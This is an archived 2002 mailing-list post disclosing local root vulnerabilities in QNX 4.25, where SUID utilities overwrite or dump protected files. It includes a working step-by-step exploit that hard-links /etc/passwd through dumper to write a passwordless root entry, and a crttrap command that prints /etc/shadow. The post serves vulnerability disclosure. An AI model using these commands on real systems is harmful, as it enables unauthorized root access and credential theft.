I think I found what appears to be several (or one fundamental) vulnerabilities under QNX(tested on version 4.25). I have not found any documentation/reference to these anywhere, so I assume they/it were not known. Importance of the bug: any local user can gain root access(which, under QNX, means root access to the entire network, of course) Nature: some(or "most" ? or "all" ?) SUID programs that output data to files actually do not look for permissions before overwriting identical(already existent) filenames. Also, they follow hard links(I did not verify how they react to symbolic links). In fact, not only do they overwrite the files, but they give the user ownership of the file. So programs like /bin/dumper, monitor, the Watcom "sample" utility, can be used to overwrite and gain ownership of read-only, root-owned files such as /etc/passwd. From there, it's easy to figure out how to gain root access... Example exploit, with /bin/dumper: Let EVIL be the unprivileged user who wants to gain root access. #link to the passwd file: dumper dumps to [process name].dmp $ ln /etc/passwd /home/EVIL/ksh.dmp #call the program that will attempt to write to the hard link $ dumper -d /home/EVIL -p [PID of EVIL's ksh] #have dumper do its job by terminating the monitored process $ exit #at this point, /etc/passwd is overwritten by the binary dump, and more importantly: EVIL is now the owner ! $ echo root::0:0::///:/bin/sh > /etc/passwd #but now no login works because /etc/passwd is not owned by userid 0. #So you do: $ passwd #and change your password. This gives /etc/passwd ownership back to root, keeping the modifications you have made. $ su # "monitor" is even easier to exploit, for example, because you can directly specify the filename with the parameter -f /etc/passwd. No need for a link. Another similar vulnerability was with crttrap. This utility has one interesting parameter/option that allows you to dump the contents of the configuration file.... and it is SUID. So all you have to do is: $ crttrap -c /etc/shadow ...and it will dump the shadow file for you(even if you normally do not have read access to it, such as with an unprivileged user). So this can either be seen as multiple vulnerabilities in different programs, or as a single fundamental flaw in the ownership/permissions checking of the filesystem. I could not tell at what level exactly is the flaw. Could some of you reproduce the exploit and confirm that it works ? I would like to make sure that it is not specific to, maybe, some configuration flaw in the systems I used to test it. Also, if you could check with the most recent QNX versions to see if this is still applicable... P.S.: I also noticed that Watcom sample and int10, but not monitor, will segfault when they are given long filenames as a parameter... Maybe this can turn into a buffer overflow, but I did not have the time to check. Simon Ouellette _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri May 31 2002 - 14:57:31 PDT